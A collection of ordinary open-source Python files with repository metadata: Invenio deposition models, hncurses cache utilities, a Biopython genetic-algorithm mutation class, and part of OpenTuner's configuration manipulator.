data = request.values.to_dict()
obj.data = data
return obj
@classmethod
def get(cls):
obj = cls(current_user.get_id())
obj.load()
return obj
def save(self):
""" Save data to session """
if self.has_data():
session['deposit_prefill'] = self.data
session.modified = True
else:
self.delete()
def load(self):
""" Load data from session """
self.data = session.get('deposit_prefill', {})
def delete(self):
""" Delete data in session """
if 'deposit_prefill' in session:
del session['deposit_prefill']
session.modified = True
def has_data(self):
"""
Determine if the cache has data.
"""
return bool(self.data)
def fill_draft(self, deposition, draft_id, clear=True):
"""
Fill a draft with cached draft values
"""
draft = deposition.get_or_create_draft(draft_id)
draft.process(self.data)
if clear:
self.data = {}
self.delete()
return draft
class DepositionDraft(FactoryMixin):
"""
Represents the state of a form
"""
def __init__(self, draft_id, form_class=None, deposition_ref=None):
self.id = draft_id
self.completed = False
self.form_class = form_class
self.values = {}
self.flags = {}
self._form = None
# Back reference to the depositions
self._deposition_ref = deposition_ref
self.validate = False
def __getstate__(self):
return dict(
completed=self.completed,
values=self.values,
flags=self.flags,
validate=self.validate,
)
def __setstate__(self, state):
self.completed = state['completed']
self.form_class = None
if self._deposition_ref:
self.form_class = self._deposition_ref.type.draft_definitions.get(
self.id
)
self.values = state['values']
self.flags = state['flags']
self.validate = state.get('validate', True)
def is_completed(self):
return self.completed
def has_form(self):
return self.form_class is not None
def authorize(self, action):
if not self._deposition_ref:
return True # Not connected to deposition so authorize anything.
return self._deposition_ref.type.authorize_draft(
self._deposition_ref, self, action
)
def complete(self):
"""
Set state of draft to completed.
"""
self.completed = True
def update(self, form):
"""
Update draft values and flags with data from form.
"""
data = dict((key, value) for key, value in form.data.items()
if value is not None)
self.values = data
self.flags = form.get_flags()
def process(self, data, complete_form=False):
"""
Process, validate and store incoming form data and return response.
"""
if not self.authorize('update'):
raise ForbiddenAction('update', self)
if not self.has_form():
raise FormDoesNotExists(self.id)
# The form is initialized with form and draft data. The original
# draft_data is accessible in Field.object_data, Field.raw_data is the
# new form data and Field.data is the processed form data or the
# original draft data.
#
# Behind the scences, Form.process() is called, which in turns call
# Field.process_data(), Field.process_formdata() and any filters
# defined.
#
# Field.object_data contains the value of process_data(), while
# Field.data contains the value of process_formdata() and any filters
# applied.
form = self.get_form(formdata=data)
# Run form validation which will call Field.pre_valiate(),
# Field.validators, Form.validate_<field>() and Field.post_validate().
# Afterwards Field.data has been validated and any errors will be
# present in Field.errors.
validated = form.validate()
# Call Form.run_processors() which in turn will call
# Field.run_processors() that allow fields to set flags (hide/show)
# and values of other fields after the entire formdata has been
# processed and validated.
validated_flags, validated_data, validated_msgs = (
form.get_flags(), form.data, form.messages
)
form.post_process(formfields=[] if complete_form else data.keys())
post_processed_flags, post_processed_data, post_processed_msgs = (
form.get_flags(), form.data, form.messages
)
# Save form values
self.update(form)
# Build result dictionary
process_field_names = None if complete_form else data.keys()
# Determine if some fields where changed during post-processing.
changed_values = dict(
(name, value) for name, value in post_processed_data.items()
if validated_data[name] != value
)
# Determine changed flags
changed_flags = dict(
(name, flags) for name, flags in post_processed_flags.items()
if validated_flags.get(name, []) != flags
)
# Determine changed messages
changed_msgs = dict(
(name, messages) for name, messages in post_processed_msgs.items()
if validated_msgs.get(name, []) != messages
or process_field_names is None or name in process_field_names
)
result = {}
if changed_msgs:
result['messages'] = changed_msgs
if changed_values:
result['values'] = changed_values
if changed_flags:
for flag in CFG_FIELD_FLAGS:
fields = [
(name, flag in field_flags)
for name, field_flags in changed_flags.items()
]
result[flag + '_on'] = map(
lambda x: x[0], filter(lambda x: x[1], fields)
)
result[flag + '_off'] = map(
lambda x: x[0], filter(lambda x: not x[1], fields)
)
return form, validated, result
def get_form(self, formdata=None, load_draft=True,
validate_draft=False):
"""
Create form instance with draft data and form data if provided.
:param formdata: Incoming form data.
:param files: Files to ingest into form
:param load_draft: True to initialize form with draft data.
:param validate_draft: Set to true to validate draft data, when no form
data is provided.
"""
if not self.has_form():
raise FormDoesNotExists(self.id)
# If a field is not present in formdata, Form.process() will assume it
# is blank instead of using the draft_data value. Most of the time we
# are only submitting a single field in JSON via AJAX requests. We
# therefore reset non-submitted fields to the draft_data value with
# form.reset_field_data().
# WTForms deal with unicode - we deal with UTF8 so convert all
draft_data = unicodifier(self.values) if load_draft else {}
formdata = MultiDict(formdata or {})
form = self.form_class(
formdata=formdata, **draft_data
)
if formdata:
form.reset_field_data(exclude=formdata.keys())
# Set field flags
if load_draft and self.flags:
form.set_flags(self.flags)
# Ingest files in form
if self._deposition_ref:
form.files = self._deposition_ref.files
else:
form.files = []
if validate_draft and draft_data and formdata is None:
form.validate()
return form
@classmethod
def merge_data(cls, drafts):
"""
Merge data of multiple drafts
Duplicate keys will be overwritten without warning.
"""
data = {}
# Don't include *) disabled fields, and *) empty optional fields
func = lambda f: not f.flags.disabled and (f.flags.required or f.data)
for d in drafts:
if d.has_form():
visitor = DataExporter(
filter_func=func
)
visitor.visit(d.get_form())
data.update(visitor.data)
else:
data.update(d.values)
return data
class Deposition(object):
"""
Wraps a BibWorkflowObject
Basically an interface to work with BibWorkflowObject data attribute in an
easy manner.
"""
def __init__(self, workflow_object, type=None, user_id=None):
self.workflow_object = workflow_object
if not workflow_object:
self.files = []
self.drafts = {}
self.type = self.get_type(type)
self.title = ''
self.sips = []
self.workflow_object = BibWorkflowObject.create_object(
id_user=user_id,
)
# Ensure default data is set for all objects.
self.update()
else:
self.__setstate__(workflow_object.get_data())
self.engine = None
#
# Properties proxies to BibWorkflowObject
#
@property
def id(self):
return self.workflow_object.id
@property
def user_id(self):
return self.workflow_object.id_user
@user_id.setter
def user_id(self, value):
self.workflow_object.id_user = value
self.workflow_object.workflow.id_user = value
@property
def created(self):
return self.workflow_object.created
@property
def modified(self):
return self.workflow_object.modified
@property
def drafts_list(self):
# Needed for easy marshaling by API
return self.drafts.values()
#
# Proxy methods
#
def authorize(self, action):
"""
Determine if certain action is authorized
Delegated to deposition type to allow overwriting default behavior.
"""
return self.type.authorize(self, action)
#
# Serialization related methods
#
def marshal(self):
"""
API representation of an object.
Delegated to the DepositionType, to allow overwriting default
behaviour.
"""
return self.type.marshal_deposition(self)
def __getstate__(self):
"""
Serialize deposition state for storing in the BibWorkflowObject
"""
# The bibworkflow object id and owner is implicit, as the Deposition
# object only wraps the data attribute of a BibWorkflowObject.
# FIXME: Find better solution for setting the title.
for d in self.drafts.values():
if 'title' in d.values:
self.title = d.values['title']
break
return dict(
type=self.type.get_identifier(),
title=self.title,
files=[f.__getstate__() for f in self.files],
drafts=dict(
[(d_id, d.__getstate__()) for d_id, d in self.drafts.items()]
),
sips=[f.__getstate__() for f in self.sips],
)
def __setstate__(self, state):
"""
Deserialize deposition from state stored in BibWorkflowObject
"""
self.type = DepositionType.get(state['type'])
self.title = state['title']
self.files = [
DepositionFile.factory(
f_state,
uuid=f_state['id'],
backend=DepositionStorage(self.id),
)
for f_state in state['files']
]
self.drafts = dict(
[(d_id, DepositionDraft.factory(d_state, d_id,
deposition_ref=self))
for d_id, d_state in state['drafts'].items()]
)
self.sips = [
SubmissionInformationPackage.factory(s_state, uuid=s_state['id'])
for s_state in state.get('sips', [])
]
#
# Persistence related methods
#
def update(self):
"""
Update workflow object with latest data.
"""
data = self.__getstate__()
# BibWorkflow calls get_data() before executing any workflow task, and
# and calls set_data() after. Hence, unless we update the data
# attribute it will be overwritten.
try:
self.workflow_object.data = data
except AttributeError:
pass
self.workflow_object.set_data(data)
def reload(self):
"""
Get latest data from workflow object
"""
self.__setstate__(self.workflow_object.get_data())
def save(self):
"""
Save the state of the deposition.
Uses the __getstate__ method to make a JSON serializable
representation which, sets this as data on the workflow object
and saves it.
"""
self.update()
self.workflow_object.save()
def delete(self):
"""
Delete the current deposition
"""
if not self.authorize('delete'):
raise DepositionNotDeletable(self)
for f in self.files:
f.delete()
if self.workflow_object.id_workflow != '':
if self.workflow_object.id_workflow:
Workflow.delete(uuid=self.workflow_object.id_workflow)
BibWorkflowObject.query.filter_by(
id_workflow=self.workflow_object.id_workflow
).delete()
else:
db.session.remove(self.workflow_object)
db.session.commit()
#
# Workflow execution
#
def run_workflow(self, headless=False):
"""
Execute the underlying workflow
If you made modifications to the deposition you must save if before
running the workflow, using the save() method.
"""
if self.workflow_object.workflow is not None:
current_status = self.workflow_object.workflow.status
if current_status == WorkflowStatus.COMPLETED:
return self.type.api_final(self) if headless \
else self.type.render_final(self)
self.update()
self.engine = self.type.run_workflow(self)
self.reload()
status = self.engine.status
if status == WorkflowStatus.ERROR:
return self.type.api_error(self) if headless else \
self.type.render_error(self)
elif status != WorkflowStatus.COMPLETED:
return self.type.api_step(self) if headless else \
self.type.render_step(self)
elif status == WorkflowStatus.COMPLETED:
return self.type.api_completed(self) if headless else \
self.type.render_completed(self)
def reinitialize_workflow(self):
"""
Reinitialize a workflow object (i.e. prepare it for editing)
"""
if self.state != 'done':
raise InvalidDepositionAction("Action only allowed for "
"depositions in state 'done'.")
if not self.authorize('reinitialize'):
raise ForbiddenAction('reinitialize', self)
self.type.reinitialize_workflow(self)
def stop_workflow(self):
"""
Stop a running workflow object (e.g. discard changes while editing).
"""
if self.state != 'inprogress' or not self.submitted:
raise InvalidDepositionAction("Action only allowed for "
"depositions in state 'inprogress'.")
if not self.authorize('stop'):
raise ForbiddenAction('stop', self)
self.type.stop_workflow(self)
def set_render_context(self, ctx):
"""
Set rendering context - used in workflow tasks to set what is to be
rendered (either by API or UI)
"""
self.workflow_object.deposition_context = ctx
def get_render_context(self):
"""
Get rendering context - used by DepositionType.render_step/api_step
"""
return getattr(self.workflow_object, 'deposition_context', {})
@property
def state(self):
"""
Return simplified workflow state - inprogress, done or error
"""
try:
status = self.workflow_object.workflow.status
if status == WorkflowStatus.ERROR:
return "error"
elif status == WorkflowStatus.COMPLETED:
return "done"
except AttributeError:
pass
return "inprogress"
#
# Draft related methods
#
def get_draft(self, draft_id):
"""
Get draft
"""
if draft_id not in self.drafts:
raise DraftDoesNotExists(draft_id)
return self.drafts[draft_id]
def get_or_create_draft(self, draft_id):
"""
Get or create a draft for given draft_id
"""
if draft_id not in self.drafts:
if draft_id not in self.type.draft_definitions:
raise DraftDoesNotExists(draft_id)
if not self.authorize('add_draft'):
raise ForbiddenAction('add_draft', self)
self.drafts[draft_id] = DepositionDraft(
draft_id,
form_class=self.type.draft_definitions[draft_id],
deposition_ref=self,
)
return self.drafts[draft_id]
def get_default_draft_id(self):
"""
Get the default draft id for this deposition.
"""
return self.type.default_draft_id(self)
#
# Submission information package related methods
#
def get_latest_sip(self, sealed=None):
"""
Get the latest submission information package
:param sealed: Set to true to only returned latest sealed SIP. Set to
False to only return latest unsealed SIP.
"""
if len(self.sips) > 0:
for sip in reversed(self.sips):
if sealed is None:
return sip
elif sealed and sip.is_sealed():
return sip
elif not sealed and not sip.is_sealed():
return sip
return None
def create_sip(self):
"""
Create a new submission information package (SIP) with metadata from
the drafts.
"""
metadata = DepositionDraft.merge_data(self.drafts.values())
metadata['files'] = map(
lambda x: dict(path=x.path, name=os.path.splitext(x.name)[0]),
self.files
)
sip = SubmissionInformationPackage(metadata=metadata)
self.sips.append(sip)
return sip
def has_sip(self, sealed=True):
"""
Determine if deposition has a sealed submission information package.
"""
for sip in self.sips:
if (sip.is_sealed() and sealed) or \
(not sealed and not sip.is_sealed()):
return True
return False
@property
def submitted(self):
return self.has_sip()
#
# File related methods
#
def get_file(self, file_id):
for f in self.files:
if f.uuid == file_id:
return f
return None
def add_file(self, deposition_file):
if not self.authorize('add_file'):
raise ForbiddenAction('add_file', self)
for f in self.files:
if f.name == deposition_file.name:
raise FilenameAlreadyExists(deposition_file.name)
self.files.append(deposition_file)
file_uploaded.send(
self.type.get_identifier(),
deposition=self,
deposition_file=deposition_file,
)
def remove_file(self, file_id):
if not self.authorize('remove_file'):
raise ForbiddenAction('remove_file', self)
idx = None
for i, f in enumerate(self.files):
if f.uuid == file_id:
idx = i
if idx is not None:
return self.files.pop(idx)
return None
def sort_files(self, file_id_list):
"""
Order the files according the list of ids provided to this function.
"""
if not self.authorize('sort_files'):
raise ForbiddenAction('sort_files', self)
search_dict = dict(
[(f, i) for i, f in enumerate(file_id_list)]
)
def _sort_files_cmp(f_x, f_y):
i_x = search_dict.get(f_x.uuid, None)
i_y = search_dict.get(f_y.uuid, None)
if i_x == i_y:
return 0
elif i_x is None or i_x > i_y:
return 1
elif i_y is None or i_x < i_y:
return -1
self.files = sorted(self.files, _sort_files_cmp)
#
# Class methods
#
@classmethod
def get_type(self, type_or_id):
if type_or_id and isinstance(type_or_id, type) and \
issubclass(type_or_id, DepositionType):
return type_or_id
else:
return DepositionType.get(type_or_id) if type_or_id else \
DepositionType.get_default()
@classmethod
def create(cls, user, type=None):
"""
Create a new deposition object.
To persist the deposition, you must call save() on the created object.
If no type is defined, the default deposition type will be assigned.
@param user: The owner of the deposition
@param type: Deposition type identifier.
"""
t = cls.get_type(type)
if not t.authorize(None, 'create'):
raise ForbiddenAction('create')
# Note: it is correct to pass 'type' and not 't' below to constructor.
obj = cls(None, type=type, user_id=user.get_id())
return obj
@classmethod
def get(cls, object_id, user=None, type=None):
"""
Get the deposition with specified object id.
@param object_id: The BibWorkflowObject id.
@param user: Owner of the BibWorkflowObject
@param type: Deposition type identifier.
"""
if type:
type = DepositionType.get(type)
try:
workflow_object = BibWorkflowObject.query.filter(
BibWorkflowObject.id == object_id,
# id_user!=0 means current version, as opposed to some snapshot
# version.
BibWorkflowObject.id_user != 0,
).one()
except NoResultFound:
raise DepositionDoesNotExists(object_id)
if user and workflow_object.id_user != user.get_id():
raise DepositionDoesNotExists(object_id)
obj = cls(workflow_object)
if type and obj.type != type:
raise DepositionDoesNotExists(object_id, type)
return obj
@classmethod
def get_depositions(cls, user=None, type=None):
params = [
Workflow.module_name == 'webdeposit',
]
if user:
params.append(BibWorkflowObject.id_user == user.get_id())
else:
params.append(BibWorkflowObject.id_user != 0)
if type:
params.append(Workflow.name == type.get_identifier())
objects = BibWorkflowObject.query.join("workflow").options(
db.contains_eager('workflow')).filter(*params).order_by(
BibWorkflowObject.modified.desc()).all()
def _create_obj(o):
try:
obj = cls(o)
except InvalidDepositionType as err:
current_app.logger.exception(err)
return None
if type is None or obj.type == type:
return obj
return None
return filter(lambda x: x is not None, map(_create_obj, objects))
class SubmissionInformationPackage(FactoryMixin):
"""Submission information package (SIP).
:param uuid: Unique identifier for this SIP
:param metadata: Metadata in JSON for this submission information package
:param package: Full generated metadata for this package (i.e. normally
MARC for records, but could anything).
:param timestamp: UTC timestamp in ISO8601 format of when package was
sealed.
:param agents: List of agents for this package (e.g. creator, ...)
:param task_ids: List of task ids submitted to ingest this package (may be
appended to after SIP has been sealed).
"""
def __init__(self, uuid=None, metadata={}):
self.uuid = uuid or str(uuid4())
self.metadata = metadata
self.package = ""
self.timestamp = None
self.agents = []
self.task_ids = []
def __getstate__(self):
return dict(
id=self.uuid,
metadata=self.metadata,
package=self.package,
timestamp=self.timestamp,
task_ids=self.task_ids,
agents=[a.__getstate__() for a in self.agents],
)
def __setstate__(self, state):
self.uuid = state['id']
self._metadata = state.get('metadata', {})
self.package = state.get('package', None)
self.timestamp = state.get('timestamp', None)
self.agents = [Agent.factory(a_state)
for a_state in state.get('agents', [])]
self.task_ids = state.get('task_ids', [])
def seal(self):
self.timestamp = datetime.now(tzutc()).isoformat()
def is_sealed(self):
return self.timestamp is not None
@property
def metadata(self):
return self._metadata
@metadata.setter
def metadata(self, value):
import datetime
import json
class DateTimeEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, (datetime.datetime, datetime.date)):
encoded_object = obj.isoformat()
else:
encoded_object = json.JSONEncoder.default(self, obj)
return encoded_object
data = json.dumps(value, cls=DateTimeEncoder)
self._metadata = json.loads(data)
class Agent(FactoryMixin):
"""Agent."""
def __init__(self, role=None, from_request_context=False):
self.role = role
self.user_id = None
self.ip_address = None
self.email_address = None
if from_request_context:
self.from_request_context()
def __getstate__(self):
return dict(
role=self.role,
user_id=self.user_id,
ip_address=self.ip_address,
email_address=self.email_address,
)
def __setstate__(self, state):
self.role = state['role']
self.user_id = state['user_id']
self.ip_address = state['ip_address']
self.email_address = state['email_address']
def from_request_context(self):
from flask import request
from invenio.ext.login import current_user
self.ip_address = request.remote_addr
self.user_id = current_user.get_id()
self.email_address = current_user.info.get('email', '')
|
egabancho/invenio
|
invenio/modules/deposit/models.py
|
Python
|
gpl-2.0
| 47,429
|
[
"VisIt"
] |
3c34e194bd9af2ecdc966d509ff1f6720b9f38f99c391de79e50b26f52402489
|
# -*- coding: utf-8 -*-
import json
import os
import time
from config import *
LETTER_Y = [[" _______________________________________________ "],
["| ___________________________________________ |"],
["| | | |"],
["| | | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYYYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | | |"],
["| |___________________________________________| |"],
["|_______________________________________________|"],
[" HNCURSES "],
[" "],
[" AUTHOR: Brian Houston Morrow "]]
def _dircheck(hn_dir):
'''
Check for hn cache directory and create
if it doesn't exist.
Keyword arguments:
hn_dir -- Directory to store cache information.
'''
try:
os.makedirs(hn_dir)
except OSError:
if not os.path.isdir(hn_dir):
raise
def _filecheck(cachefile):
'''
Check for cache file, creating if non-existant.
Keyword arguments:
cachefile -- Filename for cache.
'''
if not os.path.isfile(cachefile):
open(cachefile, "w").close()
def _make_URL(endpoint, id=None):
'''
Construct URL for json API request.
Keyword arguments:
endpoint -- URL endpoint to retrieve.
id -- ID of object to retrieve.
Defaults to none to allow the retrieval
of index items.
Returns:
URL for specific object.
'''
arr = [BASE_URL, VERSION, endpoint, str(id)] if id\
else [BASE_URL, VERSION, endpoint]
return "/".join(arr) + ".json"
def _check_expired(cachefile, expiry):
'''
Check if the cache file is expired.
Keyword arguments:
cachefile -- Filename for cache.
expiry -- Number of seconds after which cache is expired.
Returns:
True if the cache is expired, False otherwise.
'''
with open(cachefile, "r") as fh:
line1 = fh.readline().rstrip()
return True if line1 == "" or int(line1) < _get_time() - expiry else False
def _get_cache_file(filename, mode):
'''
Open the cache file, throwing away the first line
if we open in read mode. Doing so allows us to
read the stories without worrying about accidentally getting cache file time.
Keyword arguments:
filename -- Cache filename.
mode -- Mode in which to open the file.
Returns:
File object for cache file.
'''
f = open(filename, mode)
if mode == "r":
f.readline()
return f
def _get_time():
'''
Get current seconds since epoch as an int.
Returns:
int representation of seconds since epoch.
'''
return int(time.time())
|
killerbat00/hncurses
|
src/utils.py
|
Python
|
mit
| 4,389
|
[
"Brian"
] |
b301de9d5447bc9d2aa95e1f9854d0bf0beffb251970e77a90d8a2cbe89c031a
|
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
"""General functionality for mutations.
"""
# standard library
import random
# local stuff
from Bio.GA.Organism import Organism
class SafeFitnessMutation(object):
"""Perform mutations, but do not allow decreases in organism fitness.
This doesn't actually do any mutation work, but just checks that
newly create organisms do not have lower fitnesses.
"""
def __init__(self, actual_mutation, accept_less=0.0):
"""Initialize to do safe mutations
Arguments:
o actual_mutation - A Mutation class which actually implements
mutation. functionality.
o accept_less - A probability to accept mutations which
generate lower fitness. This allows you to accept some
crossovers which reduce fitness, but not all of them.
"""
self._mutation = actual_mutation
self._accept_less_percent = accept_less
self._accept_less_rand = random.Random()
def mutate(self, org):
"""Perform safe mutation of the specified organism.
"""
new_org = self._mutation.mutate(org)
new_org.recalculate_fitness()
if org.fitness > new_org.fitness:
accept_less_chance = self._accept_less_rand.random()
if accept_less_chance <= self._accept_less_percent:
return new_org
else:
return org
else:
return new_org
|
updownlife/multipleK
|
dependencies/biopython-1.65/build/lib.linux-x86_64-2.7/Bio/GA/Mutation/General.py
|
Python
|
gpl-2.0
| 1,583
|
[
"Biopython"
] |
1fbf3795cdc7d983c057a5df651b21ddc8209516b823dbd4daedbcb1d5b31579
|
# vim: tabstop=2 shiftwidth=2 softtabstop=2 expandtab autoindent smarttab
import abc
import collections
import copy
import hashlib
import json
import logging
import math
import os
import pickle
import random
from fn import _
import argparse
from datetime import datetime
import numpy
import inspect
import sys
log = logging.getLogger(__name__)
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument('--list-params', '-lp',
help='list available parameter classes')
class ConfigurationManipulatorBase(object):
"""
abstract interface for objects used by search techniques to mutate
configurations
"""
__metaclass__ = abc.ABCMeta
# List of file formats, which can be extended by subclasses. Used in
# write_to_file() and load_from_file(). Objects in list must define
# load(fd) and dump(cfg, fd).
FILE_FORMATS = {'default': json, 'json': json,
'pickle': pickle, 'pk': pickle}
def validate(self, config):
"""is the given config valid???"""
return all(map(_.validate(config), self.parameters(config)))
def normalize(self, config):
"""mutate config into canonical form"""
for param in self.parameters(config):
param.normalize(config)
def set_search_driver(self, search_driver):
"""called exactly once during setup"""
pass
def copy(self, config):
"""produce copy of config"""
return copy.deepcopy(config)
def parameters_dict(self, config):
"""convert self.parameters() to a dictionary by name"""
return dict([(p.name, p) for p in self.parameters(config)])
def param_names(self, *args):
"""return union of parameter names in args"""
return sorted(reduce(set.union,
[set(map(_.name, self.parameters(cfg)))
for cfg in args]))
def linear_config(self, a, cfg_a, b, cfg_b, c, cfg_c):
"""return a configuration that is a linear combination of 3 other configs"""
dst = self.copy(cfg_a)
dst_params = self.proxy(dst)
for k in self.param_names(dst, cfg_a, cfg_b, cfg_c):
dst_params[k].op4_set_linear(cfg_a, cfg_b, cfg_c, a, b, c)
return dst
def _get_serializer(self, filename, format=None):
"""
Extract the correct file format serializer from self.FILE_FORMATS.
Guess the format by extension if one is not given.
"""
if format is None:
format = os.path.splitext(filename)[1].lower().replace('.', '')
if format not in self.FILE_FORMATS:
serializer = self.FILE_FORMATS['default']
if len(self.FILE_FORMATS) > 1:
log.warning('Unknown file format "%s", using "%s" instead', format,
serializer.__name__)
else:
serializer = self.FILE_FORMATS[format]
return serializer
def save_to_file(self, cfg, filename, format=None):
"""
Write cfg to filename. Guess the format by extension if one is not given.
"""
with open(filename, 'wb') as fd:
self._get_serializer(filename, format).dump(cfg, fd)
def load_from_file(self, filename, format=None):
"""
Read cfg from filename. Guess the format by extension if one is not given.
"""
with open(filename, 'rb') as fd:
return self._get_serializer(filename, format).load(fd)
def proxy(self, cfg):
return ManipulatorProxy(self, cfg)
@abc.abstractmethod
def random(self):
"""produce a random initial configuration"""
return
@abc.abstractmethod
def parameters(self, config):
"""return a list of of Parameter objects"""
return list()
@abc.abstractmethod
def hash_config(self, config):
"""produce unique hash value for the given config"""
return
class ConfigurationManipulator(ConfigurationManipulatorBase):
"""
a configuration manipulator using a fixed set of parameters and storing
configs in a dict-like object
"""
def __init__(self, params=None, config_type=dict, seed_config=None, **kwargs):
if params is None:
params = []
self.params = list(params)
self.config_type = config_type
self.search_driver = None
self._seed_config = seed_config
super(ConfigurationManipulator, self).__init__(**kwargs)
for p in self.params:
p.parent = self
def add_parameter(self, p):
p.set_parent(self)
self.params.append(p)
#TODO sub parameters should be recursed on
# not currently an issue since no doubly-nested sub-parameters
sub_params = p.sub_parameters()
for sp in sub_params:
sp.set_parent(p)
self.params.extend(sub_params)
def set_search_driver(self, search_driver):
self.search_driver = search_driver
def seed_config(self):
"""produce a fixed seed configuration"""
if self._seed_config:
cfg = copy.deepcopy(self._seed_config)
else:
cfg = self.config_type()
for p in self.params:
if not isinstance(p.name, str) or '/' not in p.name:
cfg[p.name] = p.seed_value()
return cfg
def random(self):
"""produce a random configuration"""
cfg = self.seed_config()
for p in self.parameters(cfg):
p.op1_randomize(cfg)
return cfg
def parameters(self, config):
"""return a list of Parameter objects"""
if type(config) is not self.config_type:
log.error("wrong type, expected %s got %s",
str(self.config_type),
str(type(config)))
raise TypeError()
return self.params
def parameters_to_json(self):
"""
output information about the parameters in this manipulator in json format:
[ConfigurationManipulator,{pinfo:count,pinfo:count ...}]
where pinfo has a similar form to describe the parameter's sub-parameters:
[param_name,{pinfo:count,pinfo:count ...}]
"""
def param_info_to_json(param, sub_parameters):
"""
recursively output information about a parameter and its subparameters in a json format:
[parameter_name, {subparam_info:count,subparam_info:count,...}]
or if no subparams
[parameter_name,{}]
where subparam_info are sorted alphabetically. Note we can't directly use json since
sets/dictionaries aren't always ordered by key
"""
sub_parameter_counts = {}
# build the string
if isinstance(param, str):
param_name = param
else:
param_name = param.__class__.__name__
out = ['[', param_name, ',{']
if len(sub_parameters) > 0:
# count sub params
for sp in sub_parameters:
spout = param_info_to_json(sp, sp.sub_parameters())
sub_parameter_counts[spout] = sub_parameter_counts.get(spout, 0) + 1
# add the count map in sorted order
for sp in sorted(sub_parameter_counts):
out.append(sp)
out.append(':')
out.append(str(sub_parameter_counts[sp]))
out.append(',')
out.pop() # remove trailing comma
out.append('}]')
return ''.join(out)
# filter out subparameters to avoid double counting
params = [p for p in self.params if p.parent is self]
return param_info_to_json(self, params)
def hash_config(self, config):
"""produce unique hash value for the given config"""
m = hashlib.sha256()
params = list(self.parameters(config))
params.sort(key=_.name)
for i, p in enumerate(params):
m.update(str(p.name))
m.update(p.hash_value(config))
m.update(str(i))
m.update("|")
return m.hexdigest()
def search_space_size(self):
"""estimate the size of the search space, not precise"""
return reduce(_ * _, [x.search_space_size() for x in self.params])
def difference(self, cfg1, cfg2):
cfg = self.copy(cfg1)
for param in self.parameters(cfg1):
if param.is_primitive(cfg1):
# TODO: check range
param.set_value(cfg, param.get_value(cfg1) - param.get_value(cfg2))
else:
pass
return cfg
def applySVs(self, cfg, sv_map, args, kwargs):
"""
Apply operators to each parameter according to given map. Updates cfg.
Parameters with no operators specified are not updated.
cfg: configuration data
sv_map: python dict that maps string parameter name to class method name
arg_map: python dict that maps string parameter name to class method
arguments
"""
# TODO: check consistency between sv_map and cfg
param_dict = self.parameters_dict(cfg)
for pname in self.param_names(cfg):
param = param_dict[pname]
getattr(param, sv_map[pname])(cfg, *args[pname], **kwargs[pname])
class Parameter(object):
"""
abstract base class for parameters in a ConfigurationManipulator
"""
__metaclass__ = abc.ABCMeta
def __init__(self, name):
self.name = name
self.parent = None
super(Parameter, self).__init__()
def _to_storage_type(self, val):
"""hook to support transformation applied while stored"""
return val
def _from_storage_type(self, sval):
"""hook to support transformation applied while stored"""
return sval
def _read_node(self, config):
"""hook to support different storage structures"""
node = config
if not isinstance(self.name, str):
return node, self.name
name_parts = self.name.split('/')
for part in name_parts[:-1]:
if isinstance(node, list):
part = int(part)
node = node[part]
part = name_parts[-1]
if isinstance(node, list):
part = int(part)
return node, part
def _get(self, config):
"""hook to support different storage structures"""
node, part = self._read_node(config)
return self._from_storage_type(node[part])
def _set(self, config, v):
"""hook to support different storage structures"""
node, part = self._read_node(config)
node[part] = self._to_storage_type(v)
def set_parent(self, manipulator):
self.parent = manipulator
def validate(self, config):
"""is the given config valid???"""
return True
def is_primitive(self, ignored=None):
return isinstance(self, PrimitiveParameter)
def is_permutation(self, ignored=None):
return isinstance(self, PermutationParameter)
def manipulators(self, config):
"""
a list of manipulator functions to change this value in the config
manipulators must be functions that take a config and change it in place
default implementation just has op1_randomize as only operation
"""
return [self.op1_randomize]
def normalize(self, config):
"""
mutate this parameter into a canonical form
"""
pass
def sub_parameters(self):
"""
additional parameters added with this parameter
"""
return []
@abc.abstractmethod
def op1_randomize(self, cfg):
"""
Set this parameter's value in a configuration to a random value
:param config: the configuration to be changed
"""
pass
@abc.abstractmethod
def seed_value(self):
"""some legal value of this parameter (for creating initial configs)"""
return
@abc.abstractmethod
def copy_value(self, src, dst):
"""copy the value of this parameter from src to dst config"""
pass
@abc.abstractmethod
def same_value(self, cfg1, cfg2):
"""test if cfg1 and cfg2 have the same value of this parameter"""
return
@abc.abstractmethod
def hash_value(self, config):
"""produce unique hash for this value in the config"""
return
@abc.abstractmethod
def op4_set_linear(self, cfg, cfg_a, cfg_b, cfg_c, a, b, c):
"""
Sets the parameter value in a configuration to a linear combination of 3
other configurations: :math:`a*cfg_a + b*cfg_b + c*cfg_c`
:param cfg: the configuration to be changed
:param cfg_a: a parent configuration
:param cfg_b: a parent configuration
:param cfg_c: a parent configuration
:param a: weight for cfg_a
:param b: weight for cfg_b
:param c: weight for cfg_c
"""
pass
def search_space_size(self):
return 1
def op1_nop(self, cfg):
"""
The 'null' operator. Does nothing.
:param cfg: the configuration to be changed
"""
pass
# Stochastic variators
def op3_swarm(self, cfg, cfg1, cfg2, c, c1, c2, *args, **kwargs):
"""
Stochastically 'move' the parameter value in a configuration towards those
in two parent configurations. This is done by calling :py:meth:`opn_stochastic_mix`
:param cfg: the configuration to be changed
:param cfg1: a parent configuration
:param cfg2: a parent configuration
:param c: weight of original configuration
:param c1: weight for cfg1
:param c2: weight for cfg2
"""
# default to probabilistic treatment
